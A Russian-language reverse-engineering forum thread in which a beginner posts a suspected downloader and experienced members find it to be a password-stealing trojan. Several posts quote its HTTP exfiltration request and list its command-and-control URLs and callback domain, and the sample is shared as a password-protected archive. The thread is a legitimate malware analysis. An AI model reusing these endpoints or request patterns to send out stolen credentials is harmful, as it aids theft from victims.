Сейчас на форуме: asfa, bartolomeo (+6 невидимых)

 eXeL@B —› Вопросы новичков —› Непонятности насчет упаковки
Посл.ответ Сообщение

Ранг: 8.7 (гость)
Активность: 0.020
Статус: Участник

Создано: 01 мая 2012 19:33 · Поправил: Contrafack
· Личное сообщение · #1

Вот уже долгое время бьюсь над даунлоадерм... PEiD.v0.95 (скачал с exelab) определяет, как неупакованный.
файл весит 98 кб, говорят, что это много очень для даунлоадера и он может быть на самом деле упакован.
вот что показывает PeID


просто хочу самостоятельно изучать, но вот никак немогу понять что к чему. открыл через Olly дебаггер, но ничего подозрительного не нашел. Проверил на онлайн сервисах -там тоже не нашел IP адрес, откуда хотел качать тело.

сам исходник не похож на шифрованного, но и нет ничего подозрительного.

Может все таки упакован чем то? есть другие методики определять ли тчно или нет?



Ранг: 189.9 (ветеран), 334thx
Активность: 0.30
Статус: Участник

Создано: 01 мая 2012 20:00
· Личное сообщение · #2

Чего ты скрин показываешь? Ну если так, то пусть это будет VMProtect. Тело выкладывай под паролем )))



Ранг: 8.7 (гость)
Активность: 0.020
Статус: Участник

Создано: 01 мая 2012 20:17
· Личное сообщение · #3

NikolayD

да не хочу на общую терзание )))) хочу как бы чтоб подксазали в чем дела...
могу вам выслать по ПМ, если хотите.



Ранг: 189.9 (ветеран), 334thx
Активность: 0.30
Статус: Участник

Создано: 01 мая 2012 20:25
· Личное сообщение · #4

Энтропию глянь если высокая, есть вероятность что паковано/шифровано.



Ранг: 8.7 (гость)
Активность: 0.020
Статус: Участник

Создано: 01 мая 2012 20:31
· Личное сообщение · #5

NikolayD

Вот скрин


тут странно немного... 7.12(Packed)




Ранг: 238.8 (наставник), 67thx
Активность: 0.20
Статус: Участник
CyberHunter

Создано: 01 мая 2012 22:21
· Личное сообщение · #6

Самопальный упаковщик, имхо. OEP=00001000h, такое обычно на асме получается.

-----
Nulla aetas ad discendum sera




Ранг: 8.7 (гость)
Активность: 0.020
Статус: Участник

Создано: 01 мая 2012 23:12
· Личное сообщение · #7

Flint

Теперь как расспаковывать ?




Ранг: 238.8 (наставник), 67thx
Активность: 0.20
Статус: Участник
CyberHunter

Создано: 01 мая 2012 23:21
· Личное сообщение · #8

файл выкладывай, без него что-либо обсуждать бессмысленно.

-----
Nulla aetas ad discendum sera




Ранг: 8.7 (гость)
Активность: 0.020
Статус: Участник

Создано: 01 мая 2012 23:36
· Личное сообщение · #9

ладно, выладываю уже ))) а то нихрена не могу сам понять что к чему. только пожалуйста расскажите что к чему и как расшифорвали.
пароль на архив - virus

ab3d_01.05.2012_EXELAB.rU.tgz - 0.45004017242902683.rar



Ранг: 441.3 (мудрец), 297thx
Активность: 0.410.04
Статус: Участник

Создано: 01 мая 2012 23:59
· Личное сообщение · #10

Ничем оно не упаковано. Тырит все пароли и пытается коннектиться к нескольким адресам, чтобы всё это слить.



Ранг: 8.7 (гость)
Активность: 0.020
Статус: Участник

Создано: 02 мая 2012 00:10
· Личное сообщение · #11

tihiy_grom
Все таки это кейлоггер? а все антивирусы определяют , как даунлоадер...

А по какими признаками это вы определяли? хочу тоже понять где эта функция, которая собиарет инфа (откуда) и куда хочет высылать.




Ранг: 529.0 (!), 110thx
Активность: 0.290.04
Статус: Участник
5KRT

Создано: 02 мая 2012 00:29 · Поправил: daFix
· Личное сообщение · #12

Самопальный двухслойный пакер, второй слой написан на Visual C++ 10.0 (Visual Studio 2010).
Шарится по кустам реестра, по файлам, вытаскивая логины, пароли.

ASCII "PKDFILE0CRYPTED01.0"

-----
Research For Food





Ранг: 238.8 (наставник), 67thx
Активность: 0.20
Статус: Участник
CyberHunter

Создано: 02 мая 2012 00:40 · Поправил: Flint
· Личное сообщение · #13

Trojan.PWS.Multi.502
отстукивать сюда пытается cerotate.com
и кстати энтропия высокая за счет aplib

-----
Nulla aetas ad discendum sera





Ранг: 529.0 (!), 110thx
Активность: 0.290.04
Статус: Участник
5KRT

Создано: 02 мая 2012 00:50 · Поправил: daFix
· Личное сообщение · #14

Flint
Я так понял это тело второго слоя пакера, ибо под ним лежит ещё одно тело, которое пароли собирает


POST /uxf9r.php HTTP/1.0
Host: winusing.com
Content-Length: 531
Connection: close
Content-Type: application/octet-stream
Content-Encoding: binary
User-Agent: Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)

-----
Research For Food





Ранг: 238.8 (наставник), 67thx
Активность: 0.20
Статус: Участник
CyberHunter

Создано: 02 мая 2012 01:09
· Личное сообщение · #15

Проглядел я это. Это дллка, грабит пароли. В ней тоже свои гейты есть http://winusing.com/uxf9r.php
http://onlinetumb.com/uxf9r.php
видимо ее писал другой автор.

-----
Nulla aetas ad discendum sera





Ранг: 529.0 (!), 110thx
Активность: 0.290.04
Статус: Участник
5KRT

Создано: 02 мая 2012 01:18
· Личное сообщение · #16

Flint пишет:
Это дллка, грабит пароли


EXE

-----
Research For Food





Ранг: 238.8 (наставник), 67thx
Активность: 0.20
Статус: Участник
CyberHunter

Создано: 02 мая 2012 01:22 · Поправил: Flint
· Личное сообщение · #17

dll



-----
Nulla aetas ad discendum sera


| Сообщение посчитали полезным: daFix, igorca


Ранг: 529.0 (!), 110thx
Активность: 0.290.04
Статус: Участник
5KRT

Создано: 02 мая 2012 01:30 · Поправил: daFix
· Личное сообщение · #18

Беру свои слова обратно, был не прав. Только один слой, но тело вируса подгружает виртуальную dll

f355_01.05.2012_EXELAB.rU.tgz - 5.rar

-----
Research For Food




Ранг: 8.7 (гость)
Активность: 0.020
Статус: Участник

Создано: 02 мая 2012 02:51
· Личное сообщение · #19


я так и знал, по этому не хотел вкладывать...
Мне интересовал самое гланое не то - что делает этот Malware, а каким образом рассаковали и по каким сигнатурам решили, что он ворует логины и пароли и куда шлет?



Ранг: 441.3 (мудрец), 297thx
Активность: 0.410.04
Статус: Участник

Создано: 02 мая 2012 03:21
· Личное сообщение · #20

Contrafack пишет:
Мне интересовал самое гланое не то - что делает этот Malware, а каким образом рассаковали и по каким сигнатурам решили, что он ворует логины и пароли и куда шлет?

Ну я загрузил файл в олю и поставил бряк на CreateFileA - вот так и узнал. Хотите тоже научиться - читайте статьи о том, как работать с отладчиком.



Ранг: 8.7 (гость)
Активность: 0.020
Статус: Участник

Создано: 02 мая 2012 15:47
· Личное сообщение · #21

А можете выложить расспакованный варинат, с паролем virus ?



Ранг: 8.7 (гость)
Активность: 0.020
Статус: Участник

Создано: 04 мая 2012 01:12
· Личное сообщение · #22

эххх.
может все таки кто небудь скажет каким образом поняли, что это упакован, как распаковывали хотябы?


 eXeL@B —› Вопросы новичков —› Непонятности насчет упаковки
:: Ваш ответ
Жирный  Курсив  Подчеркнутый  Перечеркнутый  {mpf5}  Код  Вставить ссылку 
:s1: :s2: :s3: :s4: :s5: :s6: :s7: :s8: :s9: :s10: :s11: :s12: :s13: :s14: :s15: :s16:


Максимальный размер аттача: 500KB.
Ваш логин: german1505 » Выход » ЛС
   Для печати Для печати